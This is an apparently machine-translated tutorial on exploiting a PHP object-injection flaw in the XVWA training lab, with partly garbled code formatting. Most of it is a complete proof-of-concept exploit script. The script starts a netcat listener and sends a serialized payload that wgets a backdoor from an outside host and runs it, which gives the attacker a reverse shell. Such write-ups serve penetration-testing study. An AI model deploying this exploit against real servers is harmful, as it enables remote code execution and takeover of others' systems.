PHP serialization/object Injection Vulnerability
This article is a short story about PHP serialization/object injection vulnerability analysis. It describes how to obtain the remote shell of a host. If you want to test this vulnerability on your own, you can use XVWA and Kevgir. The first step of vulnerability exploitation is to test whether PHP serialization exists in the target application. To assist in the test, we use the Burpsuite SuperSerial plug-in, here. It passively detects the existence of PHP and Java serialization.
Analysis
We have detected that PHP serialization is used in the application, so we can start to check whether the application code contains the Remote Code Execution Vulnerability. Note that serialized objects are obtained from the parameter "r:
$ Var1 = unserialize ($ _ REQUEST ['R']);
Then perform deserialization and eval:
Eval ($ this-> inject );
Next, execute:
Echo "". $ var1 [0]. "-". $ var1 [1];
With this, if we bypass the PHP serialization object of the parameter r, we can get the code execution vulnerability!
class PHPObjectInjection{ public $inject; function __construct(){ } function __wakeup(){ if(isset($this->inject)){ eval($this->inject); } } }//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";} if(isset($_REQUEST['r'])){ $var1=unserialize($_REQUEST['r']); if(is_array($var1)){ echo "".$var1[0]." - ".$var1[1]; } }else{ echo "parameter is missing"; }? >
Vulnerability Exploitation
To exploit this vulnerability, we created a simple PHP script to automatically generate PHP serialization payload and run the command we wanted on the target remote host. Then, I created a general PHP bounce shell, as shown below:
Http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: You need to upload this file to the web server, modify the local ip address and port in the reverse shell script, and the following code:
/*PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.comA simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access.Shouts to @jstnkndy @yappare for theassist!NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured*/print"==============================================================================\r\n";print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";print"==============================================================================\r\n";print "[+] Generating serializedpayload...[OK]\r\n";print "[+] Launching reverselistener...[OK]\r\n";system('gnome-terminal -x sh -c \'nc -lvvp1234\'');class PHPObjectInjection{ //CHANGE URL/FILENAME TO MATCH YOUR SETUP public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";} $url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER$url = $url . urlencode(serialize(newPHPObjectInjection));print "[+] Sendingexploit...[OK]\r\n";print "[+] Dropping down tointeractive shell...[OK]\r\n";print"==============================================================================\r\n";$response =file_get_contents("$url"); ? >Demo
Now that our script is ready, we can execute it to obtain the reverse shell on the remote host for remote command execution!